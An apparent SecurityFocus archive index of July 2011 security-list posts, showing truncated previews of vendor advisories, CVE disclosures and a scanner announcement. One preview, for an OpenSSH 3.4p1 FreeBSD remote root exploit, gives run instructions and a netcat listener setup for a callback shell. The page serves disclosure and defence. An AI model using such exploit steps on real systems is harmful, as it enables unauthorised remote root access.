SecurityFocus

Integer overflow in foobar2000 1.1.7 2011-07-04
Luigi Auriemma (aluigi autistici org)

#######################################################################

Luigi Auriemma

Application: foobar2000
http://www.foobar2000.org
Versions: <= 1.1.7
Platforms: Windows
Bug: integer overflow
Date: 03 Jul 2011
Author: L

[ more ] [ reply ]

bcksrvr format string in Sybase Adaptive Server 15.5 2011-06-27
Luigi Auriemma (aluigi autistici org)

#######################################################################

Luigi Auriemma

Application: Sybase Adaptive Server
http://www.sybase.com/products/databasemanagement/adaptiveserverenterpri
se
Versions: <= 15.5
Platforms: Solaris, Windows, Li

[ more ] [ reply ]

Arbitrary files deletion in HP OpenView Performance Agent 2011-06-27
Luigi Auriemma (aluigi autistici org)

#######################################################################

Luigi Auriemma

Application: HP OpenView Performance Agent
http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-
937022
Versions: ovbbccb.exe <= 6.20.50.0
Platfo

[ more ] [ reply ]

Multiple Cross-Site Scripting vulnerabilities in WebCalendar 2011-07-04
sschurtz t-online de

Advisory: Multiple Cross-Site Scripting vulnerabilities in WebCalendar
Advisory ID: SSCHADV2011-008
Author: Stefan Schurtz
Affected Software: Version 1.2.3 and probably prior versions
Vendor URL: http://www.k5n.us/webcalendar.php
Vendor Status: informed
CVE

[ more ] [ reply ]

[SECURITY] [DSA 2271-1] curl security update 2011-07-02
Giuseppe Iuculano (iuculano debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-2271-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Giuseppe Iuculano
July 02, 2011

[ more ] [ reply ]

ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability 2011-07-01
ZDI Disclosures (zdi-disclosures tippingpoint com)

ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-232

July 1, 2011

-- CVE ID:
CVE-2011-1867

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewle

[ more ] [ reply ]

[security bulletin] HPSB3C02687 SSRT100377 rev.1 - HP Intelligent Management Center User Access Manager (UAM) and Endpoint Admission Defense (EAD), Remote Execution of Arbitrary Code 2011-07-01
security-alert hp com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02901775
Version: 1

HPSB3C02687 SSRT100377 rev.1 - HP Intelligent Management Center User Access Manager (UAM) and Endpoint Admission Defense (EAD), Remote Execution of Arbitrary Code

NOTICE: The

[ more ] [ reply ]

SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress 2011-07-01
SEC Consult Vulnerability Lab (research sec-consult com)

SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
=======================================================================
title: Multiple SQL Injection Vulnerabilities
product: WordPress
vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
fix

[ more ] [ reply ]

Vega beta release: a new open-source web-application security assessment platform 2011-07-01
David Mirza (dma subgraph com)

Hey,

We've been quietly working for the last few months on a new platform for
scanning and pen-testing web applications. It's called Vega. It's
GUI-based, open source, and includes an automated scanner and
intercepting proxy. We launched the beta today at FISL12.

Vega is written in Java, based on

[ more ] [ reply ]

[SECURITY] [DSA 2270-1] qemu-kvm security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-2270-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[ more ] [ reply ]

[SECURITY] [DSA 2269-1] iceape security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-2269-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[ more ] [ reply ]

[SECURITY] [DSA 2262-2] php5 update 2011-07-01
Moritz Muehlenhoff (jmm debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-2266-2 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[ more ] [ reply ]

[SECURITY] [DSA 2268-1] iceweasel security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-2268-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[ more ] [ reply ]

[SECURITY] [DSA 2267-1] perl security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-2267-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[ more ] [ reply ]

Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) 2011-07-01
HI-TECH . (isowarez isowarez isowarez googlemail com)

you can apply the patch using the diff if you don't want to run that.

2011/7/1 Benji <me (at) b3nji (dot) com [email concealed]>:
> So you want people to download your statically linked binary?
>
> On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
> <isowarez.isowarez.isowarez (at) googlemail (dot) com [email concealed]> wrote:
>>
>> OpenSSH FreeBSD Remote Root E

[ more ] [ reply ]

Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) 2011-07-01
HI-TECH . (isowarez isowarez isowarez googlemail com)

OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found bel

[ more ] [ reply ]

NetBSD 5.1 libc/net multiple functions stack buffer overflow 2011-07-01
cxib securityreason com

[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/

Date:
- Dis.: 01.04.2011
- Pub.: 01.07.2011

CVE: CVE-2011-1656
CWE: CWE-121

Affected software:
- NetBSD 5.1 (fixed)

Affected functions:
- getservbyname(3)
- getservbyna

[ more ] [ reply ]

Re: [Full-disclosure] OpenSSH 3.5p1 Remote Root Exploit for FreeBSD 2011-07-01
Darren Tucker (dtucker zip com au)

This seems to be in libopie rather than sshd or libpam and happens
when the username is longer than OPIE_PRINCIPAL_MAX. I'm not sure
exactly where inside libopie it is, but commenting out pam_opie.so
seems to prevent it.

http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/pa
m_opi

[ more ] [ reply ]

Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used 2011-06-30
pierre ernst ca ibm com

Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-refere
nce/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix:

[ more ] [ reply ]

[security bulletin] HPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code 2011-06-29
security-alert hp com

CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability 2011-06-29
CORE Security Technologies Advisories (advisories coresecurity com)

CORE-2011-0514: Multiple vulnerabilities in HP Data Protector 2011-06-29
CORE Security Technologies Advisories (advisories coresecurity com)

Re: Resolved - NNT Change Tracker - Hard-Coded Encryption Key Originally posted as http://seclists.org/fulldisclosure/2011/May/460 2011-06-29
dennis brunnen gmail com

As is probably obvious to other readers, I did indeed notify NNT by email of the vulnerability before making it public - as mentioned in my initial disclosue. I'm not sure what possible reason anyone would have to say that if it were not true.

Glad to see you apparently did the right thing and even

[ more ] [ reply ]

ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)

ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-231

June 29, 2011

-- CVE ID:
CVE-2010-3790

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

--

[ more ] [ reply ]

ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)

ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-230

June 29, 2011

-- CVE ID:
CVE-2011-0211

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Qui

[ more ] [ reply ]

ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)

ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-229

June 29, 2011

-- CVE ID:
CVE-2011-0209

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- T

[ more ] [ reply ]

ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)

ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-228

June 29, 2011

-- CVE ID:
CVE-2011-0200

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Mail
Apple OS

[ more ] [ reply ]

Breaking the links: Exploiting the linker 2011-06-29
Tim Brown (timb nth-dimension org uk)

I've recently been working on a paper on Linux and POSIX linkers, the most
recent release of which can be found at:

* http://www.nth-dimension.org.uk/downloads.php?id=77

I'm particularly interested in feedback on references or threats that I may
have missed. As per the abstract, the aim of the

[ more ] [ reply ]

[SECURITY] [DSA 2266-1] php5 security update 2011-06-29
Moritz Muehlenhoff (jmm debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-2266-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
June 29, 2011

[ more ] [ reply ]

Resolved - NNT Change Tracker - Hard-Coded Encryption Key - Originally posted as http://seclists.org/fulldisclosure/2011/May/460 2011-06-29
NNT Support (support nntws com)

Subject: Resolved - NNT Change Tracker - Hard-Coded Encryption Key -
Originally posted as http://seclists.org/fulldisclosure/2011/May/460

Background
-----------------

The product employs a portion of legacy code as referenced in the original
post. This is used for the product key and some database

[ more ] [ reply ]